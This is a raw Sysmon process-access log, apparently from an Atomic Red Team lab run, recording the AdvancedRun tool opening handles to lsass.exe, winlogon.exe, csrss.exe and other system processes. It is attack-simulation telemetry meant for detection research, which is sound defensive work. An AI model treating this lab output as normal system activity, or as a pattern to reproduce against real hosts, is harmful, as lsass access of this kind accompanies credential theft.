17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983774Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983773Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983772Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983771Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983770Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983768Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983767Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983766Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 